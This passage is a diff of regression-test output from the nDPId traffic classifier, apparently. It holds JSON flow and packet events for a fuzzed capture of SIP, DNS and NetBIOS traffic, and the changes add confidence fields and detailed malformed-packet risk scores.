uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udH5jdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMFo4MTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgZzcyNi0zMi84MDAwDXNhPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zRm5kcmVjdg0K"}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1120470050187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470050187,"pkt":"ADBUADRWAODtAW69CABFAABIanEAAFgRTODAqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAB0AAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049190,"flow_last_seen":1120470050187,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470050187,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":116,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049190,"flow_last_seen":1120470050187,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470050187,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":116,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1120470050699,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"ts_msec":1120470050699,"pkt":"ADBUADRWAODtAdO9CABFAANSanIAAIARyujAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFmY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5W6FRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQm9udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTMyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllF2SBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDA0DQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049696,"flow_last_seen":1120470050699,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470050699,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049696,"flow_last_seen":1120470050699,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470050699,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 01239{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1120470051405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":637,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":637,"pkt_l4_len":603,"ts_msec":1120470051405,"pkt":"AODtAW69ADBUADRWCABFAAJvAABAAC8RRz7IRHhRwKgBAhPEE8QCWxwoU0lQL3guMCAxMDAgdHJ5aW5nIC0tIHlvdXIgY2FsbCBpcyBpbXBvcnRhbnQgdG8gdXMNClZpYTogU0lQLzIuMC9VRFAgMTkyLnE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQ9NTA2MDtyZWNlaXZlZD04MC4yMzAuMjE5LjcwDQpGcm9tOiAiYXJpayIgPHNpcDo4MTY2NjZAdm9pcC5icnVyanVsYS5uZXQ+O3RhZz02NDMzZWY5DQpUbzptPHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0Pg0KQ2FsbC1JRDogMTA1MDkwMjU5LTQ0NmZhZjdhQDEZMi4lcxAuMS4yDUdDU2VxOiAxIElOVklURQ0KU2VydmVyOiAlcwAgRVhwcmVzcyByb3V0ZXIgKDAuOC4xgCAoaaY4Ni9saSVzACkpDQpDb250ZW50LUxlbmclcwAgMA0KV2FybmluZzogMzkyIDIwMC42OC4xMjAuODE6NTA2MCAiTm9pc3kgZmVlZGJhY2sgdGVsbHM6ICBwaWQ5MzI2NDIgcmVxX3NyY19pcD04MC4yMzAuMjE5LjcwIHJlcV9zcmNfcG9ydD01MDYwIGluX3VyaT1zaXA6OTcyMzkyODcwNDRAdm9pcC5icnVqdWxhLm5ldCBvdXRfdXJpPXNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IHZpYR9jbnQ9PTEiDQoNCg=="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1120470052189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470052189,"pkt":"ADBUADRWAODtAW69CABFAABIanMAAIARTN7AqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470049190,"flow_last_seen":1120470052189,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470052189,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470049190,"flow_last_seen":1120470052189,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470052189,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1120469572981,"flow_last_seen":1120470032084,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6079,"flow_avg_l4_payload_len":405,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1120469572981,"flow_last_seen":1120470032084,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6079,"flow_avg_l4_payload_len":405,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470065389,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1120470066200,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470066200,"pkt":"ADBUADRWAODtMm69CABFAABEangAAIARTN3AqAECwKgBAQq9ADUAMAo6GsgAAAABAFmqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1120470066201,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470066201,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0AR+y1GsiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00355{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"ts_msec":1120470066203,"pkt":"ADBUADRWAODtAW69KABFAAAhankAAIARGJPAqAEC1PIhIxPEE8QADcBLICAgICA="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1120470066293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470066293,"pkt":"ADBUADRWAODtAW69CABFAABIanoAAIARTNfAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
